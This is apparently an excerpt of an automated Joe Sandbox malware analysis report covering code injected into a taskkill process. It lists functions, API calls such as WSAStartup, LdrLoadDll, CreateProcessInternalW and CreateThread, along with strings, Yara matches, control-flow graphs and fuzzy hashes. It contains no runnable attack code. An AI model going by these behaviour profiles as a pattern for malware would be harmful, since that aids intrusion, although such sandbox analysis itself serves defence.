                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 62900222211C0042F60075684C14B070005CBD1307F55C155A1195555CCB15D9765521
                                                                                                                                                                                                                                      Function 04BE2F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3899568873.0000000004B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004C99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004C9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004D0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4b70000_taskkill.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                                      • Opcode ID: c37db3e554914c16521678d8180e1600740356219e687aa5199cee76bf2b1781
                                                                                                                                                                                                                                      • Instruction ID: ac91ce1fcef7c4c46085a1d0f6ca90830b35d7eeb2676d2709c8900f0139ea04
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c37db3e554914c16521678d8180e1600740356219e687aa5199cee76bf2b1781
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F290026234140442F50071584814B060005CBE2305F55C055E20A5555D8719DD676126
                                                                                                                                                                                                                                      Function 04BE2AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3899568873.0000000004B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004C99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004C9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004D0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4b70000_taskkill.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                                      • Opcode ID: cc653820151411b46c8b69e24b1007703bc9775116d5064b864d4cbc71a877be
                                                                                                                                                                                                                                      • Instruction ID: ae5552f2a026f5c3a0804df33fc2d87b390524b3d0ec92532eea04153bfa9bba
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cc653820151411b46c8b69e24b1007703bc9775116d5064b864d4cbc71a877be
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C5900226221400022545B5580A0450B0445DBD7355395C055F2457591CC721D97A5321
                                                                                                                                                                                                                                      Function 04BE2AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3899568873.0000000004B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004C99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004C9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004D0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4b70000_taskkill.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                                      • Opcode ID: 625fbbe7db1b63bada74a27b0c66ba562831706bc352870ad72f70cd6bb161ee
                                                                                                                                                                                                                                      • Instruction ID: c44315f86db36b314fb73421933a1d5e40684dd3b43aaacad43169c17800fad5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 625fbbe7db1b63bada74a27b0c66ba562831706bc352870ad72f70cd6bb161ee
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7F900226211400032505B5580B045070046CBD6355355C061F2056551CD721D9765121
                                                                                                                                                                                                                                      Function 04BE2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3899568873.0000000004B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004C99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004C9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004D0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4b70000_taskkill.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                                      • Opcode ID: 6b505747d2f05731b01ed537ec61f6305acd407872af8c37ef034737ed2030e7
                                                                                                                                                                                                                                      • Instruction ID: 08bd7e8d5bc25c41004ebd46ed28e6d032dd8eab80c35d6c47f3e60902b1ff85
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6b505747d2f05731b01ed537ec61f6305acd407872af8c37ef034737ed2030e7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5790026220240003650571584814616400ACBE1205B55C061E2055591DC725D9A66125
                                                                                                                                                                                                                                      Function 04BE35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3899568873.0000000004B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004C99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004C9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004D0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4b70000_taskkill.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                                      • Opcode ID: 212651bdb641de7866166e7a449572a5971c8ac4475ef9ca01fc1b0fe79fb08a
                                                                                                                                                                                                                                      • Instruction ID: a5575e9e8e29da925bdd2d83101f542caae1bcc91ab4891641a4526375da63b3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 212651bdb641de7866166e7a449572a5971c8ac4475ef9ca01fc1b0fe79fb08a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ED90023260550402F500715849147061005CBD1205F65C451A1465569D8795DA6665A2
                                                                                                                                                                                                                                      Function 04BE39B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3899568873.0000000004B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004C99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004C9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004D0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4b70000_taskkill.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                                      • Opcode ID: ad405a7cbc1b0ab9a7f6700f4c727e55feeb8126100d08c09b43a0cc410a5e69
                                                                                                                                                                                                                                      • Instruction ID: 523df90e5a0083344b5408466bec9b0af2aa3fde7f7147cac39af9f490c3000a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ad405a7cbc1b0ab9a7f6700f4c727e55feeb8126100d08c09b43a0cc410a5e69
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DF90022224545102F550715C48046164005EBE1205F55C061A1855595D8755D96A6221
                                                                                                                                                                                                                                      Function 00873750 Relevance: 9.3, APIs: 1, Strings: 5, Instructions: 295COMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 265 873750-873772 266 873777-873784 265->266 266->266 267 873786-87378e 266->267 268 873790-87379c 267->268 269 8737ea-8737f2 267->269 270 8737a5-8737c3 269->270 271 8737f4-873819 269->271 272 8737c5-8737dd 270->272 273 87374c-87374d 270->273 274 873820-873821 271->274 275 8737e4-8737e5 272->275 276 8737df-8737e0 272->276 273->265 277 873823-873838 274->277 278 8737e2-8737e3 274->278 276->278 279 873839-873842 277->279 278->275 278->279 281 873844-873847 279->281 282 8738ad-8738ae 279->282 281->274 285 873849-873854 281->285 283 8738b0-8738b5 282->283 284 87391a 282->284 286 873985-8739b8 call 871a40 284->286 287 87391c-873923 284->287 288 873856-87385b 285->288 289 8737e8 285->289 303 8739c0-8739d4 Sleep 286->303 290 873925-873938 call 87b270 287->290 291 873953-873982 call 864350 call 851410 287->291 292 87385d-87385e 288->292 293 873899-87389f 288->293 289->269 304 873a44-873a4a 290->304 305 87393e-87394f call 87b350 290->305 291->286 300 873866-873874 292->300 295 8738a1-8738a4 293->295 295->300 301 8738a6 295->301 309 873876-87388b 300->309 310 8738b9-8738bf 300->310 301->282 307 8739d6-8739e8 303->307 308 873a35-873a3c 303->308 305->291 311 873a0a-873a23 call 875e40 307->311 312 8739ea-873a08 call 875da0 307->312 308->303 314 873a3e 308->314 315 8738c1-8738c3 310->315 316 873890-873895 310->316 323 873a28-873a2b 311->323 312->323 314->304 320 8738c5-8738c8 315->320 321 8738e4-87390a 315->321 316->293 320->295 324 8738ca-8738cf 320->324 325 87390f-873917 321->325 323->308 324->325 326 8738d1 324->326 325->284 327 8738b6-8738b8 326->327 328 8738d3-8738e0 326->328 327->310
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3897564995.0000000000850000.00000040.80000000.00040000.00000000.sdmp, Offset: 00850000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_850000_taskkill.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: dll$net.$net.dll$wini$wininet.dll
                                                                                                                                                                                                                                      • API String ID: 0-721535879
                                                                                                                                                                                                                                      • Opcode ID: fe81e17f306d833755bc504155375b7c327351f415fa8d2eaa87ffc5162742c6
                                                                                                                                                                                                                                      • Instruction ID: 1fe98f9f58567eea27a46b71d062cbb5bc3263a5ea0de4f37c1cae6840ab71eb
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fe81e17f306d833755bc504155375b7c327351f415fa8d2eaa87ffc5162742c6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4891B8B1504246AFC715EF78C881ADAFFB4FF85320F588169E598DB246D3719A01CB92
                                                                                                                                                                                                                                      Function 008738F0 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 96sleepCOMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 329 8738f0-87391a 332 873985-8739b8 call 871a40 329->332 333 87391c-873923 329->333 342 8739c0-8739d4 Sleep 332->342 334 873925-873938 call 87b270 333->334 335 873953-873972 call 864350 333->335 343 873a44-873a4a 334->343 344 87393e-87394f call 87b350 334->344 341 873977-873982 call 851410 335->341 341->332 346 8739d6-8739e8 342->346 347 873a35-873a3c 342->347 344->335 348 873a0a-873a23 call 875e40 346->348 349 8739ea-873a08 call 875da0 346->349 347->342 351 873a3e 347->351 356 873a28-873a2b 348->356 349->356 351->343 356->347
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • Sleep.KERNELBASE(000007D0), ref: 008739CB
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3897564995.0000000000850000.00000040.80000000.00040000.00000000.sdmp, Offset: 00850000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_850000_taskkill.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Sleep
                                                                                                                                                                                                                                      • String ID: dll$net.$net.dll$wini$wininet.dll
                                                                                                                                                                                                                                      • API String ID: 3472027048-721535879
                                                                                                                                                                                                                                      • Opcode ID: a0e7de1503a2b9fca9b7fed6d5771d05fc8d539664c66dce0647258d175b0330
                                                                                                                                                                                                                                      • Instruction ID: 2c244a4ec1136821431db6814cb29bf32d80d094519554ffbfde53a8d72de720
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a0e7de1503a2b9fca9b7fed6d5771d05fc8d539664c66dce0647258d175b0330
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2331B5B0640605BBDB14DFA4CC81FEAFBB8FF44344F048129FA1DAB245D374AA408B95
                                                                                                                                                                                                                                      Function 008617C0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 268networkCOMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 480 8617c0-861808 call 8517a0 call 867c80 485 86180e-86185f call 87b3e0 * 3 call 865d40 480->485 486 861aef-861af4 480->486 495 861861-861880 call 875310 * 2 485->495 496 8618aa-8618b1 485->496 506 861885-861895 495->506 497 8618d5-86192c call 87aba0 call 87b350 496->497 498 8618b3-8618bb 496->498 512 861935 497->512 513 86192e-861933 497->513 498->497 500 8618bd-8618c4 498->500 500->497 503 8618c6-8618ca 500->503 503->497 507 8618cc-8618d2 call 866820 503->507 506->496 509 861897-86189e 506->509 507->497 509->498 514 8618a0-8618a7 call 865ee0 509->514 516 861937-861953 call 87b320 512->516 513->516 514->496 521 861a63-861abf call 857e20 call 864350 call 8514a0 call 871a40 516->521 522 861959 516->522 543 861ac1-861acd WSAStartup 521->543 544 861acf-861ae1 call 877db0 521->544 523 861960-861969 522->523 525 861a57-861a5d 523->525 526 86196f-86198c call 87b350 523->526 525->521 525->523 532 861997 526->532 533 86198e-861995 526->533 535 861999-8619a7 532->535 533->535 538 8619be-8619e6 call 864250 call 87b350 535->538 539 8619a9 535->539 553 8619ef 538->553 554 8619e8-8619ed 538->554 542 8619b0-8619b3 539->542 545 8619b5-8619b8 542->545 546 8619bc 542->546 543->544 551 861ae6-861ae9 544->551 545->542 548 8619ba 545->548 546->538 548->538 551->486 555 8619f1-8619f7 553->555 554->555 556 861a0e-861a54 call 864250 call 87b320 * 2 555->556 557 8619f9 555->557 556->525 559 861a00-861a03 557->559 561 861a05-861a08 559->561 562 861a0c 559->562 561->559 564 861a0a 561->564 562->556 564->556
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • WSAStartup.WS2_32(00000202,?), ref: 00861ACD
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3897564995.0000000000850000.00000040.80000000.00040000.00000000.sdmp, Offset: 00850000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_850000_taskkill.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Startup
                                                                                                                                                                                                                                      • String ID: 5$5
                                                                                                                                                                                                                                      • API String ID: 724789610-2059066348
                                                                                                                                                                                                                                      • Opcode ID: 8951149b270a41f51dd018dd03d5bedc4c0073cb1eabe347251ede42c1808bfa
                                                                                                                                                                                                                                      • Instruction ID: 7dddcfc25ea334a9a1ae0b43ada85870dae3903be6fa9b969f4832f36461fa33
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8951149b270a41f51dd018dd03d5bedc4c0073cb1eabe347251ede42c1808bfa
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 17A17F71E01209ABDF14DFA8C849BEEBBF9FF48304F194129E518E7245E7706644CBA6
                                                                                                                                                                                                                                      Function 0086F300 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3897564995.0000000000850000.00000040.80000000.00040000.00000000.sdmp, Offset: 00850000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_850000_taskkill.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: InitializeUninitialize
                                                                                                                                                                                                                                      • String ID: @J7<
                                                                                                                                                                                                                                      • API String ID: 3442037557-2016760708
                                                                                                                                                                                                                                      • Opcode ID: 1800e79c3604ae126f2c90baacdfe0cfd6e984c12027068d2f0fc8f1e7c6daa4
                                                                                                                                                                                                                                      • Instruction ID: 84a58336f7202c5c0d74010b921b47a9f6fbfbb7890a4caa609dc5bf846d0dc4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1800e79c3604ae126f2c90baacdfe0cfd6e984c12027068d2f0fc8f1e7c6daa4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4F311BB6A0020AAFDB00DFD8D8809EEB7B9FF88304F108559E515EB315D775EE458BA0
                                                                                                                                                                                                                                      Function 008643EB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 103libraryloaderCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 008643C2
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3897564995.0000000000850000.00000040.80000000.00040000.00000000.sdmp, Offset: 00850000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_850000_taskkill.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Load
                                                                                                                                                                                                                                      • String ID: 6v
                                                                                                                                                                                                                                      • API String ID: 2234796835-3628208636
                                                                                                                                                                                                                                      • Opcode ID: ca517748b8697011cb146464dcf0a0cd89a77a93f98667b4045dee6b2095d2a6
                                                                                                                                                                                                                                      • Instruction ID: 87d2151cece0e9d56e8b85d4cc480a6943ca851bbcad1bd20f522e9d538fb39e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ca517748b8697011cb146464dcf0a0cd89a77a93f98667b4045dee6b2095d2a6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1D31AB769047059FCB11CE74D881BDDBB74FF44324F54069AD404EF682E7329944CB92
                                                                                                                                                                                                                                      Function 00861A2D Relevance: 1.6, APIs: 1, Instructions: 72networkCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • WSAStartup.WS2_32(00000202,?), ref: 00861ACD
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3897564995.0000000000850000.00000040.80000000.00040000.00000000.sdmp, Offset: 00850000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_850000_taskkill.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Startup
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 724789610-0
                                                                                                                                                                                                                                      • Opcode ID: 38bb07373847a7acbd93f4091e573e5b9ae25a7f5914e47e953e3306da7bc12f
                                                                                                                                                                                                                                      • Instruction ID: dbeef47b3da4ad6a2e21b2c94464382449fb3863ba6df06a3286f4f4efa39cac
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 38bb07373847a7acbd93f4091e573e5b9ae25a7f5914e47e953e3306da7bc12f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7311A871D01218AFDB11DBA88C42BDEF7B9EF49700F044156EA08F7242E7305A4887F6
                                                                                                                                                                                                                                      Function 00864350 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 008643C2
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3897564995.0000000000850000.00000040.80000000.00040000.00000000.sdmp, Offset: 00850000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_850000_taskkill.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Load
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2234796835-0
                                                                                                                                                                                                                                      • Opcode ID: 5dcbc6baf4d259431639129e786eea26c350e9648a9a52f79217b35080b91802
                                                                                                                                                                                                                                      • Instruction ID: 50576b89144613c51fdb7ffcaa850c170c992aa7d018d88ac3238fa283c04ab0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5dcbc6baf4d259431639129e786eea26c350e9648a9a52f79217b35080b91802
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BD011EB5D0020DABDB10EAA4DD42F9EB7B8EB54308F0081A9ED1CD7245F631EB548B92
                                                                                                                                                                                                                                      Function 00879620 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateProcessInternalW.KERNELBASE(?,?,?,?,0086811E,00000010,?,?,?,00000044,?,00000010,0086811E,?,?,?), ref: 00879683
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3897564995.0000000000850000.00000040.80000000.00040000.00000000.sdmp, Offset: 00850000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_850000_taskkill.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CreateInternalProcess
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2186235152-0
                                                                                                                                                                                                                                      • Opcode ID: 5450a031f6df984c4033fe787349d76cbc6ac8c323c19fe2a5bd84b109ec046b
                                                                                                                                                                                                                                      • Instruction ID: 2f326ec4fa8f2a9bdef9312de7a955185a7c6d82b57573e801e53ab3357882a8
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5450a031f6df984c4033fe787349d76cbc6ac8c323c19fe2a5bd84b109ec046b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5001C4B2201109BBCB14DE89DC85EEB77ADEF8C754F408108BA09D3241D630F8518BA9
                                                                                                                                                                                                                                      Function 00859B90 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00859BD5
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3897564995.0000000000850000.00000040.80000000.00040000.00000000.sdmp, Offset: 00850000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_850000_taskkill.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CreateThread
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2422867632-0
                                                                                                                                                                                                                                      • Opcode ID: 0ca80b039a6a57d2add5d83463eabd07052eb8ec9c9908620c71049f0e87aeb8
                                                                                                                                                                                                                                      • Instruction ID: 47fcc5988082ab06ee42ec00697f3d0bd90fcc12a0222934dc3ea60ada1f80b0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0ca80b039a6a57d2add5d83463eabd07052eb8ec9c9908620c71049f0e87aeb8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E5F06D7338421436E72065ADAC03FD7B78CEB80BA1F144029FB0CEB1C1D995F80242AA
                                                                                                                                                                                                                                      Function 00879590 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • RtlFreeHeap.NTDLL(00000000,00000004,00000000,00498D03,00000007,00000000,00000004,00000000,00863BD8,000000F4), ref: 008795CF
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3897564995.0000000000850000.00000040.80000000.00040000.00000000.sdmp, Offset: 00850000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_850000_taskkill.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FreeHeap
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3298025750-0
                                                                                                                                                                                                                                      • Opcode ID: 4c937ed6817131215a9a64047fbf09b864b48ad324a668257b2be1f721a64870
                                                                                                                                                                                                                                      • Instruction ID: 3fefd71e7e3fc90af0f2ba06d85c167b329faf51f5d93c114923baa4986443bf
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4c937ed6817131215a9a64047fbf09b864b48ad324a668257b2be1f721a64870
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9FE06D71200305BBDA14EE58DC45FAB33ADEFC9714F004018F908E7241C671B81486BA
                                                                                                                                                                                                                                      Function 00879540 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(00861819,?,00875824,00861819,008754DE,00875824,?,00861819,008754DE,00001000,?,?,00000000), ref: 0087957C
                                                                                                                                                                                                                                      Memory Dump Source
